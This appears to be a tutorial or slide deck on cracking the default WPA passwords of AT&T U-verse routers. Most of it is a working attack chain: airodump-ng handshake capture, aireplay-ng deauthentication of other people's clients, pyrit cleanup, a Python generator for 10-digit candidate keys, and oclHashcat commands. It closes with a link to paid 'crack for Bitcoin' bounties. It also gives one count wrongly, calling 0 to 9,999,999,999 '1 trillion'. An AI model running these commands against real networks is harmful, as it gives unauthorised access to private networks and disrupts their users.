Cracking AT&T U-verse Default WPA1/2 Passwords. by Jason Wheeler Awesome blog: http://blog.init6.me E

Getting the Handshake

#airodump-ng --encrypt wpa mon0 Aircrack's site has a pretty good tutorial. Boot from Back Track 5 R3 First you want to see what kind of wifi connection you have to choose from. Start your wireless interface in monitor mode. #airmon-zc start wlan0 #airodump-ng --encrypt wpa mon0 http://www.aircrack-ng.org/doku.php?id=cracking_wpa http://www.backtrack-linux.org/downloads/

You should see several AccessPoints You should see several AccessPoints. Record the BSSID and Channel along with any associated clients shown at the bottom of airodump-ng. Once you find a couple targets on the same channel. Note down the BSSID SSID and Channel Along with Client MAC. You then need to close airodump and stop airmon

Start airmon-zc on the channel of the target. #airmon-zc stop mon0 Start airmon-zc on the channel of the target. #airmon-zc start wlan0 <Channel Number> Then start airodump on the same channel along with some other options. #airodump-ng mon0 --encrypt wpa --write <FILENAME> --output-format pcap -a --channel <Channel number> Channel number needs to be the same as your target so you can get the full four way handshake between the client and the AP. Airodump should show in the top right hand corner once you get a handshake.

Deauthenticate a client #aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 mon0 Where: -0 means deauthentication 5 is the number of deauths to send -a 00:14:6C:7E:40:80 is the MAC address of the access point -c 00:0F:B5:FD:FB:C2 is the MAC address of the client you are deauthing mon0 is the interface name

WPA Handshake

Verify 4-way Handshake load up wireshark and run a filter for EAPOL

The AP sends a nonce-value to the STA (ANonce) The AP sends a nonce-value to the STA (ANonce). The client now has all the attributes to construct the PTK. The STA sends its own nonce-value (SNonce) to the AP together with a MIC, including authentication, which is really a Message Authentication and Integrity Code: (MAIC). The AP sends the GTK and a sequence number together with another MIC. This sequence number will be used in the next multicast or broadcast frame, so that the receiving STA can perform basic replay detection. The STA sends a confirmation to the AP. All the above messages are sent as EAPOL-Key frames. As soon as the PTK is obtained it is divided into five separate keys: PTK (Pairwise Transient Key – 64 bytes) 16 bytes of EAPOL-Key Confirmation Key (KCK)– Used to compute MIC on WPA EAPOL Key message 16 bytes of EAPOL-Key Encryption Key (KEK) - AP uses this key to encrypt additional data sent (in the 'Key Data' field) to the client (for example, the RSN IE or the GTK) 16 bytes of Temporal Key (TK) – Used to encrypt/decrypt Unicast data packets 8 bytes of Michael MIC Authenticator Tx Key – Used to compute MIC on unicast data packets transmitted by the AP 8 bytes of Michael MIC Authenticator Rx Key – Used to compute MIC on unicast data packets transmitted by the station The Michael MIC Authenticator Tx/Rx Keys provided in the handshake are only used if the network is using TKIP to encrypt the data.

PMK = PBKDF2(passphrase, ssid, ssidLength, 4096, 256) The PTK is a keyed-HMAC function using the PMK on the two MAC addresses and the two nonces from the first two packets of the 4-Way Handshake.

Verify 4-way Handshake The easy way...... #pyrit -r <FILENAME>.pcap analyze If you are using backtrack you can easily check your .pcap file to see if it has a proper handshake by using pyrit. The output should tell you if you have good EAPOL handshake or workable or nothing at all if none are found.

Strip out the junk. #pyrit -r <FILENAME>.pcap -o OUTPUT.pcap strip To strip out all the crap out of your pcap file expect for your handshakes run the following:

CAP-2-HCCAP To turn your pcap file into a hashcat-plus friendly file you can upload it to https://hashcat.net/cap2hccap/ To turn your pcap file into a hashcat-plus friendly file you can upload it to https://hashcat.net/cap2hccap/

CRACK!!

Python Script import sys MAX_INT = 9999999999 BAD_PATTERNS = {x * 3 for x in '0123456789'} for number in xrange(MAX_INT): int_string = str(number).rjust(10, '0') if any(pattern in int_string for pattern in BAD_PATTERNS): continue print ( int_string ) 0-9,999,999,999 = 1 trillion 0-9999999999 skipping any number that has bad pattern = 5.45 billiion random: 3,874,204,804 two: 5,459,094,726 Saves you ~11hrs

Hashcat-plus $python 2wire.py | ./oclhashcat-plus64.bin -m 2500 -a 0 <filename>.hccap --gpu-accel=160 --gpu-loops=1024 88,770 c/s real or $./oclhashcat-plus64.bin -m 2500 -a 3 <filename>.hccap --gpu-accel=160 --gpu-loops=1024 -1?d ?1?1?1?1?1?1?1?1?1?1 114K c/s real 25,230 difference

Crack for Bitcoin. http://www.hashbounty.net/bounties

sources http://etutorials.org/Networking/802.11+security.+wi-fi+protected+access+and+802.11i/Part+II+The+Design+of+Wi- Fi+Security/Chapter+10.+WPA+and+RSN+Key+Hierarchy/